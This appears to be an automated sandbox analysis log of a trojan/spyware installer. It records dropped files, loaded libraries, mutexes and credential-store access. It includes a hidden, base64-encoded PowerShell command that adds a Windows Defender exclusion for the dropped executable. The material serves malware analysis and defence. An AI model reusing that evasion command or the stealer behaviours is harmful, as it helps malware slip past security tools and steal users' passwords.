Dropped File: C:\Users\user\AppData\Local\Temp\UaZEqnG5nO\wbfTHB1mDB.exe 69F8CEA7A5B6E5DE711E9849F4BC0244F1344966364520BC12987F1B90013754

Source: C:\Users\user\AppData\Local\Temp\UaZEqnG5nO\wbfTHB1mDB.exe	Code function: String function: 00007FF6A70467A0 appears 52 times
Source: C:\Users\user\AppData\Local\Temp\UaZEqnG5nO\wbfTHB1mDB.exe	Code function: String function: 0000018C89A44C00 appears 41 times
Source: C:\Users\user\AppData\Local\Temp\UaZEqnG5nO\wbfTHB1mDB.exe	Code function: String function: 0000018C89A55330 appears 70 times
Source: C:\Users\user\AppData\Local\Temp\UaZEqnG5nO\wbfTHB1mDB.exe	Code function: String function: 0000018C89A3B930 appears 32 times

Source: 9RM52QaURq.exe, 00000000.00000000.2167974468.0000000000D82000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenameInstaller_sharp.exe@ vs 9RM52QaURq.exe
Source: 9RM52QaURq.exe, 00000000.00000002.3242818115.000000000130E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameclr.dllT vs 9RM52QaURq.exe
Source: 9RM52QaURq.exe	Binary or memory string: OriginalFilenameInstaller_sharp.exe@ vs 9RM52QaURq.exe

Source: classification engine

Classification label: mal93.troj.spyw.evad.winEXE@7/7@1/3

Source: C:\Users\user\AppData\Local\Temp\UaZEqnG5nO\wbfTHB1mDB.exe	Code function: 8_2_0000018C89A95970 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,CloseHandle,		8_2_0000018C89A95970
Source: C:\Users\user\AppData\Local\Temp\UaZEqnG5nO\wbfTHB1mDB.exe	Code function: 8_2_0000018C89AE2008 AdjustTokenPrivileges,		8_2_0000018C89AE2008

Source: C:\Users\user\AppData\Local\Temp\UaZEqnG5nO\wbfTHB1mDB.exe

Code function: 8_2_0000018C89A4C8C0 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,

8_2_0000018C89A4C8C0

Source: C:\Users\user\AppData\Local\Temp\UaZEqnG5nO\wbfTHB1mDB.exe

Code function: 8_2_0000018C89A7F1B5 CoCreateInstance,

8_2_0000018C89A7F1B5

Source: C:\Users\user\Desktop\9RM52QaURq.exe

File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\9RM52QaURq.exe.log

Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2012:120:WilError_03
Source: C:\Users\user\AppData\Local\Temp\UaZEqnG5nO\wbfTHB1mDB.exe	Mutant created: \Sessions\1\BaseNamedObjects\Mmm-A33C734061CA11EE8C18806E6F6E69639FC88FB0

Source: C:\Users\user\Desktop\9RM52QaURq.exe

File created: C:\Users\user\AppData\Local\Temp\UaZEqnG5nO

Jump to behavior

Source: 9RM52QaURq.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: 9RM52QaURq.exe

Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%

Source: C:\Users\user\Desktop\9RM52QaURq.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\9RM52QaURq.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: wbfTHB1mDB.exe, 00000008.00000003.2573951993.0000018C88106000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));

Source: 9RM52QaURq.exe

ReversingLabs: Detection: 18%

Source: unknown	Process created: C:\Users\user\Desktop\9RM52QaURq.exe "C:\Users\user\Desktop\9RM52QaURq.exe"
Source: C:\Users\user\Desktop\9RM52QaURq.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -NoProfile -WindowStyle Hidden -EncodedCommand QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgACcAQwA6AFwAVQBzAGUAcgBzAFwAZQBuAGcAaQBuAGUAZQByAFwAQQBwAHAARABhAHQAYQBcAEwAbwBjAGEAbABcAFQAZQBtAHAAXABVAGEAWgBFAHEAbgBHADUAbgBPAFwAdwBiAGYAVABIAEIAMQBtAEQAQgAuAGUAeABlACcA
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Source: C:\Users\user\Desktop\9RM52QaURq.exe	Process created: C:\Users\user\AppData\Local\Temp\UaZEqnG5nO\wbfTHB1mDB.exe "C:\Users\user\AppData\Local\Temp\UaZEqnG5nO\wbfTHB1mDB.exe"
Source: C:\Users\user\Desktop\9RM52QaURq.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -NoProfile -WindowStyle Hidden -EncodedCommand QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgACcAQwA6AFwAVQBzAGUAcgBzAFwAZQBuAGcAaQBuAGUAZQByAFwAQQBwAHAARABhAHQAYQBcAEwAbwBjAGEAbABcAFQAZQBtAHAAXABVAGEAWgBFAHEAbgBHADUAbgBPAFwAdwBiAGYAVABIAEIAMQBtAEQAQgAuAGUAeABlACcA	Jump to behavior
Source: C:\Users\user\Desktop\9RM52QaURq.exe	Process created: C:\Users\user\AppData\Local\Temp\UaZEqnG5nO\wbfTHB1mDB.exe "C:\Users\user\AppData\Local\Temp\UaZEqnG5nO\wbfTHB1mDB.exe"	Jump to behavior

Source: C:\Users\user\Desktop\9RM52QaURq.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\9RM52QaURq.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\9RM52QaURq.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\9RM52QaURq.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\9RM52QaURq.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\9RM52QaURq.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\9RM52QaURq.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\9RM52QaURq.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\9RM52QaURq.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\9RM52QaURq.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\9RM52QaURq.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\9RM52QaURq.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\9RM52QaURq.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\9RM52QaURq.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\9RM52QaURq.exe	Section loaded: dwrite.dll	Jump to behavior
Source: C:\Users\user\Desktop\9RM52QaURq.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Users\user\Desktop\9RM52QaURq.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Users\user\Desktop\9RM52QaURq.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\Desktop\9RM52QaURq.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\9RM52QaURq.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\Desktop\9RM52QaURq.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\9RM52QaURq.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\9RM52QaURq.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\9RM52QaURq.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\Desktop\9RM52QaURq.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\9RM52QaURq.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\9RM52QaURq.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Users\user\Desktop\9RM52QaURq.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Users\user\Desktop\9RM52QaURq.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\9RM52QaURq.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Users\user\Desktop\9RM52QaURq.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Users\user\Desktop\9RM52QaURq.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\9RM52QaURq.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\9RM52QaURq.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\9RM52QaURq.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\9RM52QaURq.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\9RM52QaURq.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\9RM52QaURq.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\9RM52QaURq.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\9RM52QaURq.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\9RM52QaURq.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\9RM52QaURq.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\9RM52QaURq.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\9RM52QaURq.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Desktop\9RM52QaURq.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Desktop\9RM52QaURq.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\9RM52QaURq.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\9RM52QaURq.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\9RM52QaURq.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\9RM52QaURq.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\9RM52QaURq.exe	Section loaded: uiautomationcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\9RM52QaURq.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: fastprox.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: ncobjapi.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: mpclient.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wmitomi.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\UaZEqnG5nO\wbfTHB1mDB.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\UaZEqnG5nO\wbfTHB1mDB.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\UaZEqnG5nO\wbfTHB1mDB.exe	Section loaded: rstrtmgr.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\UaZEqnG5nO\wbfTHB1mDB.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\UaZEqnG5nO\wbfTHB1mDB.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\UaZEqnG5nO\wbfTHB1mDB.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\UaZEqnG5nO\wbfTHB1mDB.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\UaZEqnG5nO\wbfTHB1mDB.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\UaZEqnG5nO\wbfTHB1mDB.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\UaZEqnG5nO\wbfTHB1mDB.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\UaZEqnG5nO\wbfTHB1mDB.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\UaZEqnG5nO\wbfTHB1mDB.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\UaZEqnG5nO\wbfTHB1mDB.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\UaZEqnG5nO\wbfTHB1mDB.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\UaZEqnG5nO\wbfTHB1mDB.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\UaZEqnG5nO\wbfTHB1mDB.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\UaZEqnG5nO\wbfTHB1mDB.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\UaZEqnG5nO\wbfTHB1mDB.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\UaZEqnG5nO\wbfTHB1mDB.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\UaZEqnG5nO\wbfTHB1mDB.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\UaZEqnG5nO\wbfTHB1mDB.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\UaZEqnG5nO\wbfTHB1mDB.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\UaZEqnG5nO\wbfTHB1mDB.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\UaZEqnG5nO\wbfTHB1mDB.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\UaZEqnG5nO\wbfTHB1mDB.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\UaZEqnG5nO\wbfTHB1mDB.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\UaZEqnG5nO\wbfTHB1mDB.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\UaZEqnG5nO\wbfTHB1mDB.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\UaZEqnG5nO\wbfTHB1mDB.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\UaZEqnG5nO\wbfTHB1mDB.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\UaZEqnG5nO\wbfTHB1mDB.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\UaZEqnG5nO\wbfTHB1mDB.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\UaZEqnG5nO\wbfTHB1mDB.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\UaZEqnG5nO\wbfTHB1mDB.exe	Section loaded: vaultcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\UaZEqnG5nO\wbfTHB1mDB.exe	Section loaded: wintypes.dll	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\UaZEqnG5nO\wbfTHB1mDB.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0358b920-0ac7-461f-98f4-58e32cd89148}\InProcServer32

Jump to behavior

Source: C:\Users\user\Desktop\9RM52QaURq.exe	Automated click: Next
Source: C:\Users\user\Desktop\9RM52QaURq.exe	Automated click: Accept
Source: C:\Users\user\Desktop\9RM52QaURq.exe	Automated click: Next
Source: C:\Users\user\Desktop\9RM52QaURq.exe	Automated click: Accept
Source: C:\Users\user\Desktop\9RM52QaURq.exe	Automated click: Next
Source: C:\Users\user\Desktop\9RM52QaURq.exe	Automated click: Accept
Source: C:\Users\user\Desktop\9RM52QaURq.exe	Automated click: Next
Source: C:\Users\user\Desktop\9RM52QaURq.exe	Automated click: Accept
Source: C:\Users\user\Desktop\9RM52QaURq.exe	Automated click: Next
Source: C:\Users\user\Desktop\9RM52QaURq.exe	Automated click: Accept
Source: C:\Users\user\Desktop\9RM52QaURq.exe	Automated click: Next
Source: C:\Users\user\Desktop\9RM52QaURq.exe	Automated click: OK
Source: C:\Users\user\Desktop\9RM52QaURq.exe	Automated click: Accept
Source: C:\Users\user\Desktop\9RM52QaURq.exe	Automated click: Next
Source: C:\Users\user\Desktop\9RM52QaURq.exe	Automated click: OK
Source: C:\Users\user\Desktop\9RM52QaURq.exe	Automated click: Accept

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\UaZEqnG5nO\wbfTHB1mDB.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676

Jump to behavior

Source: 9RM52QaURq.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: 9RM52QaURq.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source: 9RM52QaURq.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: C:\Users\outgl\source\repos\Installer_sharp\obj\Release\Installer_sharp.pdb source: 9RM52QaURq.exe
Source:	Binary string: C:\Users\outgl\source\repos\Installer_sharp\obj\Release\Installer_sharp.pdb8 source: 9RM52QaURq.exe

Data Obfuscation

Suspicious powershell command line found

Source: C:\Users\user\Desktop\9RM52QaURq.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -NoProfile -WindowStyle Hidden -EncodedCommand QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgACcAQwA6AFwAVQBzAGUAcgBzAFwAZQBuAGcAaQBuAGUAZQByAFwAQQBwAHAARABhAHQAYQBcAEwAbwBjAGEAbABcAFQAZQBtAHAAXABVAGEAWgBFAHEAbgBHADUAbgBPAFwAdwBiAGYAVABIAEIAMQBtAEQAQgAuAGUAeABlACcA
Source: C:\Users\user\Desktop\9RM52QaURq.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -NoProfile -WindowStyle Hidden -EncodedCommand QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgACcAQwA6AFwAVQBzAGUAcgBzAFwAZQBuAGcAaQBuAGUAZQByAFwAQQBwAHAARABhAHQAYQBcAEwAbwBjAGEAbABcAFQAZQBtAHAAXABVAGEAWgBFAHEAbgBHADUAbgBPAFwAdwBiAGYAVABIAEIAMQBtAEQAQgAuAGUAeABlACcA			Jump to behavior

Source: 9RM52QaURq.exe

Static PE information: 0xB9F2BE74 [Fri Nov 9 13:30:28 2068 UTC]

Source: C:\Users\user\AppData\Local\Temp\UaZEqnG5nO\wbfTHB1mDB.exe

Code function: 8_2_0000018C89A4B820 LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,FreeLibrary,

8_2_0000018C89A4B820

Source: C:\Users\user\Desktop\9RM52QaURq.exe	Code function: 0_2_075793D7 pushad ; retf	0_2_075793D9
Source: C:\Users\user\Desktop\9RM52QaURq.exe	Code function: 0_2_075793DA push esp; retf	0_2_075793E1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 3_2_0463666A push esp; retf	3_2_04636671
Source: C:\Users\user\AppData\Local\Temp\UaZEqnG5nO\wbfTHB1mDB.exe	Code function: 8_2_0000018C89A8E89C push rbx; iretd	8_2_0000018C89A8E89D
Source: C:\Users\user\AppData\Local\Temp\UaZEqnG5nO\wbfTHB1mDB.exe	Code function: 8_2_0000018C89A8E874 push rbx; iretd	8_2_0000018C89A8E875
Source: C:\Users\user\AppData\Local\Temp\UaZEqnG5nO\wbfTHB1mDB.exe	Code function: 8_2_00007FF6A705E600 push rcx; iretd	8_2_00007FF6A705E601

Source: C:\Users\user\Desktop\9RM52QaURq.exe

File created: C:\Users\user\AppData\Local\Temp\UaZEqnG5nO\wbfTHB1mDB.exe

Jump to dropped file

Source: C:\Users\user\AppData\Local\Temp\UaZEqnG5nO\wbfTHB1mDB.exe

Code function: 8_2_0000018C89A86480 ExitProcess,OpenMutexA,ExitProcess,CreateMutexA,CreateMutexExA,ExitProcess,ReleaseMutex,CloseHandle,

8_2_0000018C89A86480

Hooking and other Techniques for Hiding and Protection

Loading BitLocker PowerShell Module

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior

Source: C:\Users\user\Desktop\9RM52QaURq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\9RM52QaURq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
